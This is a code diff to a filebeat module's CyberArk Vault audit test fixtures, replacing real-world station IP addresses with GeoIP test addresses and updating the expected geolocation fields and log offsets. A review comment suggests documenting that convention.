Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n 
\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group 
Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:58:01Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 67.43.156.14\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 67.43.156.14\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 
2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 81.2.69.143\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 81.2.69.143\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n 
PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 81.2.69.143\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log-expected.json index 131df5259cdb..0f88356cfac0 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log-expected.json @@ -9,7 +9,7 @@ "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", "cyberarkpas.audit.source_user": "PSMAppUsers", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.target_user": "PSMPApp_localhost.localdomain", "cyberarkpas.audit.timestamp": "Mar 10 01:11:22", "event.action": "add group member", 
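Review bot: The addresses being removed from this fixture look like real-world ones — 81.32.170.205 is geolocated to Barcelona by the expected JSON elsewhere in this series, and 34.71.250.247 / 35.192.121.42 appear to sit in cloud-provider ranges — so replacing them with 67.43.156.14, 67.43.156.12 and 81.2.69.143 is the right call, but nothing in the fixture records that these particular replacements were chosen because they resolve in the GeoIP test data (Bhutan and London in the companion expected files) rather than at random. A later contributor who "anonymises" further with an RFC 5737 TEST-NET address such as 192.0.2.1 would silently lose every `source.geo.*` assertion, since that range presumably has no entry in the test database. I would pin the convention beside the fixtures, e.g. a line in the module's test README: `Station IPs in these fixtures are taken from the MaxMind GeoIP2 test data (67.43.156.0/24, 81.2.69.14x) so the geoip expectations stay stable; do not swap in arbitrary public or TEST-NET addresses.` It is also worth a quick grep of the rest of the module for the three old addresses so none survives in a fixture outside this change.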
@@ -29,19 +29,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -57,7 +54,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PVWAGWAccounts",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.target_user": "PSMPGW_localhost.localdomain",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:22",
 "event.action": "add group member",
@@ -70,26 +67,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 616,
+ "log.offset": 615,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -105,7 +99,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMP_ADB_AppUsers",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.target_user": "PSMP_ADB_localhost.localdomain",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:35",
 "event.action": "add group member",
@@ -118,26 +112,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1234,
+ "log.offset": 1232,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -153,7 +144,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMMaster",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.target_user": "Administrator",
 "cyberarkpas.audit.timestamp": "Mar 10 09:58:01",
 "event.action": "add group member",
@@ -166,26 +157,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1857,
+ "log.offset": 1854,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -201,7 +189,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMAppUsers",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.target_user": "PSMApp_VAGRANT",
 "cyberarkpas.audit.timestamp": "Mar 10 09:59:29",
 "event.action": "add group member",
@@ -214,26 +202,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2455,
+ "log.offset": 2451,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -249,7 +234,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PVWAGWAccounts",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.target_user": "PSMGw_VAGRANT",
 "cyberarkpas.audit.timestamp": "Mar 10 09:59:30",
 "event.action": "add group member",
@@ -262,26 +247,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 3056,
+ "log.offset": 3051,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -297,7 +279,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMMaster",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.target_user": "Administrator",
 "cyberarkpas.audit.timestamp": "Mar 10 14:17:15",
 "event.action": "add group member",
@@ -310,25 +292,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 3659,
+ "log.offset": 3653,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
